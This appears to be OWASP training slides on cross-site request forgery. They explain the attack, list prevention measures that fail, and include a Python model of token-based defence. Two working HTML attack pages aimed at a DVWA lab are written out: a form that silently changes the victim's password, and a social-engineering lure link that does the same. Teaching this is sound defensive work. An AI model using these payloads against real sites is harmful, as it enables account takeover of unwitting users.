UNDERSTANDING CROSS SITE REQUEST FORGERY
John Patrick Lita - OWASP Manila Chapter President
Venue: Philippine Army, Cyber Security Division, Taguig City
OWASP Taguig Chapter
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
MEET THE PRESENTER
OWASP Manila Chapter President
Project Manager at Enterprise Linux Professionals
Owner of Active Security Training and Consultancy
Project leader for OWASP Online Academy
CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
CSRF ILLUSTRATION
[Figure, slides 4 to 9: a Regular Form and a CSRF Form Template shown side by side, each with a COMMENT HERE field and a POST button. The logged-in user posts "I AM AWESOME!" and it appears as "Jaypee: I AM AWESOME!". The text "I AM NOOB!" is then posted and also appears as "Jaypee: I AM NOOB!": the comment submitted through the CSRF form template is attributed to the same logged-in user.]
CANNOT READ THE ANTI-CSRF
NO SERVER SIDE VALIDATION
REVIEWING THE FORM
CHECKING THE SOURCE CODE
CSRF DEMO
PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE WEB INTERFACE
Try to copy the code of the CSRF Template and save it as an HTML file, then open the file with any browser you like, then click the submit button and analyse the behaviour. After that, try to log in. Please proceed to the next page (page 16) for the source code.
CSRF TEMPLATE SOURCE CODE
<!DOCTYPE html>
<html>
<head><title>CSRF Template</title></head>
<body><br>
<form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET">
New Password:<br>
<input type="password" autocomplete="off" name="password_new" value="12345"><br>
Confirm New Password:<br>
<input type="password" autocomplete="off" name="password_conf" value="12345"><br>
<input type="submit" value="Change" name="Change">
</form>
</body>
</html>
▸ Using a secret cookie
▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.
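As an added example (not from the slides or from DVWA), the following Python model shows why the secret-cookie measure fails and what server-side validation looks like: a browser model attaches the session cookie to every request, so a cookie-only check accepts the forged password change, while a synchronizer token kept in the session and echoed in the form body rejects it, because the attacker's page cannot read that token. The cookie and field names (PHPSESSID, csrf_token) and the in-memory session store are assumptions.

```python
import hmac
import secrets

SESSIONS = {}  # constructed in-memory store: session id -> session data

def login(user):
    """Start a session and mint a per-session anti-CSRF token (synchronizer token pattern)."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf_token": secrets.token_hex(32)}
    return sid

def cookie_only_check(request):
    """The 'secret cookie' measure from the slides: the browser attaches the session
    cookie to every request, so a forged request passes exactly like a real one."""
    return request["cookies"].get("PHPSESSID") in SESSIONS

def token_check(request):
    """Synchronizer token: the token travels in the form body, which only a page
    served by the application can contain; an attacker's page cannot read it."""
    session = SESSIONS.get(request["cookies"].get("PHPSESSID"))
    if session is None:
        return False
    submitted = request["form"].get("csrf_token", "")
    return hmac.compare_digest(submitted, session["csrf_token"])

def change_password(request, checker):
    """Perform the state-changing action only if the chosen checker accepts it."""
    if not checker(request):
        return "rejected"
    new, conf = request["form"].get("password_new"), request["form"].get("password_conf")
    if not new or new != conf:
        return "rejected"
    SESSIONS[request["cookies"]["PHPSESSID"]]["password"] = new
    return "changed"

def browser_request(sid, form):
    """What the victim's browser sends: the cookie rides along automatically,
    whether the form came from the application or from an attacker's page."""
    return {"cookies": {"PHPSESSID": sid}, "form": form}

def demo():
    sid = login("jaypee")
    token = SESSIONS[sid]["csrf_token"]  # known only to pages the application rendered
    legit = browser_request(sid, {"password_new": "s3cret", "password_conf": "s3cret", "csrf_token": token})
    # Shape of the forged form from the slides: attacker-chosen values, no token.
    forged = browser_request(sid, {"password_new": "12345", "password_conf": "12345"})
    run = lambda checker: (change_password(legit, checker), change_password(forged, checker))
    return {"cookie_only": run(cookie_only_check), "token": run(token_check)}
```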
▸ Only Accept POST requests
▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.
▸ Multi-Step Transaction: Multi-step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.
▸ URL Rewriting: This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user's session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another.
▸ HTTPS: HTTPS does nothing to defend against CSRF.
CSRF DEMO
CSRF ATTACK USING SOCIAL ENGINEERING
One technique, or attack vector, is to perform a clickjacking attack. To test this attack, please proceed to the next page for the source code, then try executing it by clicking “Click Here!”.
<!DOCTYPE html>
<html>
<head><title>Please Check your Account Here!</title></head>
<body>
<h1>Check your account Here!</h1>
<a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a>
</body>
</html>